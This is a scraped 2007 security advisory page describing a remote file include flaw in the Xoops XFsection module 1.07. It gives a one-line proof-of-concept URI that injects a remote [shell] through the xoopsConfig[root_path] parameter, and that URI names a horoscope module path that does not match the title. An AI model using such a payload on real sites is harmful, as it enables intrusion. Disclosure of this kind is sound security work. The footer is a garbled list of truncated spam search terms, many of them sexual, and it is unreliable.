about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Xoops XFsection Module Dir_Module Parameter Remote File Include Vulnerability


Title Xoops XFsection Module Dir_Module Parameter Remote File Include Vulnerability
Published 2007-06-13-12:00AM
Updated 2007-06-14-05:39PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Sp[L]o1T and George A. Theall are credited with the discovery of this vulnerability.
Vulnerable  Xoops Xoops XFsection Module 1.07
Not Vulnerable  
Code   Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/modules/horoscope/footer.php?xoopsConfig[root_path]=[shell]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 21:34:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
free downl Www.hotsex 0499297 FreeBSD 5 Buffer Ove www.worald dadu upnp explo NAKEDGRILS sexmaroc zOOm China sex 200 /compo t292t www.89..co petekdin Onsixgalle CMS is Fre t528t WW.NUDECOM bangala se buffer und katreena k Www.toto. emails vaginal ph tamilbluef simpleblog trishasex. Ayu anjani Sear /status/ad Arab sex v W w w.Wapt t274t Sexy st NAMITHA SE usermin 1. Hindi+B.F. Photosaxy bengali mo Oracle App /bbshop/sh ESMTP www.89..co lateef cro free sex m videosexx Bangla sex t912t